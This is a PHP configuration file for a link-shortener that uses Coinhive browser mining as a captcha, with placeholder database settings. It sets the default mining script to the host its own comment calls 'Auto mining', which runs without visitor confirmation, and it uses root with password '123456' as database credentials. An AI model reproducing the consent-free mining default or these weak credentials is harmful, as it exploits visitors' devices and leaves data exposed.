<?php
// ====================Database Configuration====================
$pdo_database = 'shortlink';
$pdo_host = 'localhost';
$pdo_port = 3306;
$pdo_user = 'root';
$pdo_pass = '123456';
// Links table
$pdo_table = 'links';
$pdo_cookies_table = 'cookies';
$pdo_stats_table = 'stats';
//Do not touch pdo_dsn
$pdo_dsn = 'mysql:dbname='.$pdo_database.';host='.$pdo_host.';port='.$pdo_port;
// ==============================================================


// ====================Coinhive Configuration====================
$ch_public_key = ''; // Your site public key
$ch_secret_key = ''; // Your site secret key
$ch_hasehs = 1024; // How many hashes allow users passed captcha? Min:256

$ch_host = 'https://coinhive.com/lib/coinhive.min.js';
// There have 2 host you can choose
// https://authedmine.com/lib/coinhive.min.js (AdBlock Friendly, But need user confirm)
// https://coinhive.com/lib/coinhive.min.js (Auto mining)
// ==============================================================


// =================Redirect Page Configurations=================

// About mining page you can edit it by yourself in showRedirect.php

// ==============================================================